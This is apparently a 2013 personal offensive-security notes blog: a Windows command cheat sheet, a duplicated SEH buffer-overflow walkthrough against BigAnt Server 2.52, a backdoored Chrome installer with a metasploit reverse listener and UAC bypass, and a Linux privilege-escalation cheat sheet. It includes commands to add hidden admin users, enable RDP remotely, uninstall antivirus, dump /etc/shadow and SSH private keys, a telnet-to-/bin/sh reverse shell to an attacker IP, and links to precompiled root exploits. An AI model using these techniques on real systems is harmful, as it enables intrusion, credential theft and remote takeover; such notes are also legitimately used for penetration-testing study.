Remotely determine logged in user:
wmic /node:remotecomputer computersystem get username
List running processes:
wmic process list brief
Kill a process:
wmic process where name="cmd.exe" delete
Determine open shares:
net share
wmic share list brief
Determine IP address:
ipconfig
Get a new IP address:
ipconfig /release
ipconfig /renew
Remotely display machine’s MAC address:
wmic /node:machinename nic get macaddress
Remotely list running processes every second:
wmic /node:machinename process list brief /every:1
Remotely display System Info:
wmic /node:machinename computersystem list full
Disk drive information:
wmic diskdrive list full
wmic partition list full
Bios info:
wmic bios list full
List all patches:
wmic qfe
Look for a particular patch:
wmic qfe where hotfixid="KB958644" list full
Remotely List Local Enabled Accounts:
wmic /node:machinename USERACCOUNT WHERE "Disabled=0 AND LocalAccount=1" GET Name
Start a service remotely:
wmic /node:machinename 4 service lanmanserver CALL Startservice
sc \\machinename start lanmanserver
List services:
wmic service list brief
sc \\machinename query
Disable startup service:
sc config example disabled
List user accounts:
wmic useraccount list brief
Enable RDP remotely:
wmic /node:"machinename 4" path Win32_TerminalServiceSetting where AllowTSConnections=“0” call SetAllowTSConnections “1”
List number of times a user logged on:
wmic netlogin where (name like "%adm%") get numberoflogons
Query active RDP sessions:
qwinsta /server:192.168.1.1
Remove active RDP session ID 2:
rwinsta /server:192.168.1.1 2
Remotely query registry for last logged in user:
reg query "\\computername\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultUserName
List all computers in domain “blah”:
dsquery computer "OU=example,DC=blah" -o rdn -limit 6000 > output.txt
Reboot:
shutdown /r /t 0
Shutdown:
shutdown /s /t 0
Remotely reboot machine:
shutdown /m \\192.168.1.1 /r /t 0 /f
Copy entire folder and its contents from a remote source to local machine:
xcopy /s \\remotecomputer\directory c:\local
Find location of file with string “blah” in file name:
dir c:\ /s /b | find "blah"
Spawn a new command prompt:
start cmd
Determine name of a machine with known IP:
nbtstat -A 192.168.1.1
Find directory named blah:
dir c:\ /s /b /ad | find "blah"
Command line history:
F7
Determine the current user (aka whoami Linux equivalent):
echo %USERNAME%
Determine who is apart of the administrators group:
net localgroup administrators
Add a user where bob is the username and password is blah:
net user bob blah /add
Add user bob to administrators group:
net localgroup administrators bob /add
List user accounts:
net user
Map a network share with a given drive letter of T:
net use T: \\serverNameOrIP\shareName
List network connections and the programs that are making those connections:
netstat -nba
Display contents of file text.txt:
type text.txt
Edit contents of file text.txt:
edit text.txt
Determine PC name:
hostname
Run cmd.exe as administrator user:
runas /user:administrator cmd
Uninstall a program, Symantec in this case ;-}:
wmic product where “description=’Symantec’ ” uninstall
Determine whether a system is 32 or 64 bit:
wmic cpu get DataWidth /format:list
Powershell one liner download file:
(new-object System.Net.WebClient).Downloadfile("http://example.com/file.txt", "C:\Users\bob\file.txt")
Information about OS version and other useful system information:
systeminformation
Startup applications:
wmic startup get caption,command
Recursively unzip all zip folders, you’ll need unzip.exe for this:
FOR /R %a (*.zip) do unzip -d unzipDir "%a"
This blogspot is a compilation of notes, tutorials, and Offensive Security methods. Mainly I am using this for a 'quick reference' of my notes and training. I do not lay claim to these exploits, I am merely recreating them to gain a better understanding of security issues and techniques.
Wednesday, February 27, 2013
Saturday, February 9, 2013
Buffer Overflow SEH Overwrite part 3
BigAnt Server 2.52
First the attacker enumerates machine's on the internet, using nmap etc... Attacker finds a machine running BigAnt Server 2.52. Second, after conducting more enumeration on the target machine the attacker sets up a test machine to mirror our target machine. In this situation I have used a Windows XP machine, set up as a virtual machine. Third, in this case I will refer to our test machine as 'victim' with an ip address of 172.16.94.133, the attacking machine will be known as 'attacker' with an ip address of 172.16.94.173.
Attach debugger to running process "AntServer.exe"
Skeleton exploit to send to the "victim" machine
Send skeleton exploit to the victim machine, and the debugger halt the execution flow of the program with an overwrite of the ESI register of A's, or as seen above in our skeleton exploit "\x41"
Still in the debugger go to view > seh chain. Notice our seh chain has been overwritten by all A's or "\x41" as well!
Go back to main window and select SHIFT + F9, and we pass the seh exception with an overwrite of EIP, again with all A's or "\x41"
On the attackers machine we generate a 2500 byte generic string using metasploit.
Add the generic string, we generated from metasploit, to out skeleton exploit. Resend the rewritten skeleton exploit.
This time ESI gets overwritten with a value of 6Cb7
Again go to view > seh chain. seh value 42326742
Using the above two values, 6Cb7 and 42326742, we can use metasploit to determine our 'offsets.'
Rewrite the skeleton exploit to reflect the new information. Resend.
The debugger will halt the execution flow of the program, SHIFT+F9 will pass the exception and overwrite EIP with the four A's or "\x41" * 4 as predicted in the above script.
Using a Windows DLL to overwrite the structured exception handler. Go to C:\WINDOWS\system32 and copy vbajet32.dll > to the metasploit DIR in the attacking machine. On the attacker machine run command "msfpescan -i vbajet32.dll" Reference the DLLCharacteristics, note the output
0x0000000 this means we can use this DLL to locate a seh overwrite address.
In the main debugger windows go to "E" in between L and M.on the main task bar of Ollydbg.
Click on the "E" button and double click on "vbajet32.dll" now right click and choose "Search for" > "Sequence of Commands" a pop up box will appear. Type into the box:
POP r32
POP r32
RETN
Press "Find"
Copy the POP POP RETN values.
Set a "breakpoint" on the POP POP RETN address, by pressing SHIFT +F2.
Rewrite the skeleton exploit to reflect the new information found. Restart Ollydbg and set breakpoint on 0F9A196A. Resend skeleton exploit.
We hit our breakpoint. Press SHIFT +F9. Notice we need to jump another 6 bytes to our NOP's. To do this we will use "\x90\x90\x06\xEB" will give us the additional 6 byte jump we need to hit our NOP sled then down to our shellcode .
Rewrite skeleton exploit to reflect out 6 byte jump to NOP's /with shellcode.
Set up netcat listener on port 443 and resend skeleton exploit. Resend exploit with no Debugger attached to running process on victim machine.
A quick "ipconfig" on the victim machine to confirm exploitation.
Now we have a working exploit to send across the internet to exploit the machine originally found in our enumeration phase.
First the attacker enumerates machine's on the internet, using nmap etc... Attacker finds a machine running BigAnt Server 2.52. Second, after conducting more enumeration on the target machine the attacker sets up a test machine to mirror our target machine. In this situation I have used a Windows XP machine, set up as a virtual machine. Third, in this case I will refer to our test machine as 'victim' with an ip address of 172.16.94.133, the attacking machine will be known as 'attacker' with an ip address of 172.16.94.173.
Attach debugger to running process "AntServer.exe"
Skeleton exploit to send to the "victim" machine
Send skeleton exploit to the victim machine, and the debugger halt the execution flow of the program with an overwrite of the ESI register of A's, or as seen above in our skeleton exploit "\x41"
Still in the debugger go to view > seh chain. Notice our seh chain has been overwritten by all A's or "\x41" as well!
Go back to main window and select SHIFT + F9, and we pass the seh exception with an overwrite of EIP, again with all A's or "\x41"
On the attackers machine we generate a 2500 byte generic string using metasploit.
Add the generic string, we generated from metasploit, to out skeleton exploit. Resend the rewritten skeleton exploit.
This time ESI gets overwritten with a value of 6Cb7
Again go to view > seh chain. seh value 42326742
Using the above two values, 6Cb7 and 42326742, we can use metasploit to determine our 'offsets.'
Rewrite the skeleton exploit to reflect the new information. Resend.
The debugger will halt the execution flow of the program, SHIFT+F9 will pass the exception and overwrite EIP with the four A's or "\x41" * 4 as predicted in the above script.
Using a Windows DLL to overwrite the structured exception handler. Go to C:\WINDOWS\system32 and copy vbajet32.dll > to the metasploit DIR in the attacking machine. On the attacker machine run command "msfpescan -i vbajet32.dll" Reference the DLLCharacteristics, note the output
0x0000000 this means we can use this DLL to locate a seh overwrite address.
In the main debugger windows go to "E" in between L and M.on the main task bar of Ollydbg.
Click on the "E" button and double click on "vbajet32.dll" now right click and choose "Search for" > "Sequence of Commands" a pop up box will appear. Type into the box:
POP r32
POP r32
RETN
Press "Find"
Copy the POP POP RETN values.
Set a "breakpoint" on the POP POP RETN address, by pressing SHIFT +F2.
Set up netcat listener on port 443 and resend skeleton exploit. Resend exploit with no Debugger attached to running process on victim machine.
A quick "ipconfig" on the victim machine to confirm exploitation.
Now we have a working exploit to send across the internet to exploit the machine originally found in our enumeration phase.
Wednesday, February 6, 2013
Fun backdooring Google-Chrome
*note: backdooring technique will be NOT be covered here!
After executing our exe file, Google-Chrome installs and is fully functional.
Attacking Machine:
Waiting on the attacking machine is a metasploit reverse listener on port 6666.
The ps command shows a list of running processes on the windows machine.
Notice the services running are running in no-update\victim state. This indicates I only have "user" privileges. We need to find a way to escalate our privs to an "admin" status.
Using metasploits local privilege escalation exploit, which bypasses UAC controls and escalates our privs to "admin."
Set options.
Now we can add ourselves as "admin" users, enable remote desktop, enumerate passwords on the system etc....
rooting a linux server part 1
http://download.vulnhub.com/vulnimage/vulnimage.zip
Gaining www-data access on a Linux server, using SQL authentication bypass, tamper data, and a php webshell trick.
Tuesday, February 5, 2013
Linux Priv Escalation
Full creds goes to g0tmi1k!!
http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html
Operating System
What's the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
What's the Kernel version? Is it 64-bit?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
Is there a printer?
lpstat -a
Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/service
Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check!
ps aux | grep root
ps -ef | grep root
What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/
Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
Whats cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee
Is packet sniffing possible? What can be seen? Listen to live traffic
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21
Have you got a shell? Can you interact with the system?
# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Ouput (Results)
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!
Is port forwarding possible? Redirect and interact with traffic from another view
# rinetd
# http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch
# fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port
# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)
Is tunnelling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig
Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d: # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l
What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
Anything "interesting" in the home directorie(s)? If it's possible to access
ls -ahlR /root/
ls -ahlR /home/
Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
What has the user being doing? Is there any password in plain text? What have they been edting?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
File Systems
Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other
find /etc/ -readable -type f 2>/dev/null # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
What can be found in /var/ ?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases
Any settings/files (hidden) on website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/
Is there anything in the log file(s) (Could help with "Local File Includes"!)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
If commands are limited, you break out of the "jail" shell?
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
How are file-systems mounted?
mount
df -h
Are there any unmounted file-systems?
cat /etc/fstab
What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o+w -type d 2>/dev/null # world-writeable folders
find / -perm -o+x -type d 2>/dev/null # world-executable folders
find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # world-writeable & executable folders
Any "problem" files? Word-writeable, "nobody" files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable files
find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files
Preparation & Finding Exploit Code
What development tools/languages are installed/supported?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc
How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp
Finding exploit code
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com
Finding more information regarding the exploit
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
http://www.vulnview.com/cve-details.php?cvename=[CVE]
(Quick) "Common" exploits. Warning. Pre-compiled binaries files. Use at your own risk
http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/
Mitigations
Is any of the above information easy to find?
Try doing it!
Setup a cron job which automates script(s) and/or 3rd party products
Is the system fully patched? Kernel, operating system, all applications, their plugins and web services
apt-get update && apt-get upgrade
yum update
Are services running with the minimum level of privileges required?
For example, do you need to run MySQL as root?
Scripts Can any of this be automated?!
http://pentestmonkey.net/tools/unix-privesc-check/
http://labs.portcullis.co.uk/application/enum4linux/
http://bastille-linux.sourceforge.net
Other (quick) guides & Links
Enumeration
http://www.0daysecurity.com/penetration-testing/enumeration.html
http://www.microloft.co.uk/hacking/hacking3.htm
Misc
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf
http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html
Subscribe to:
Posts (Atom)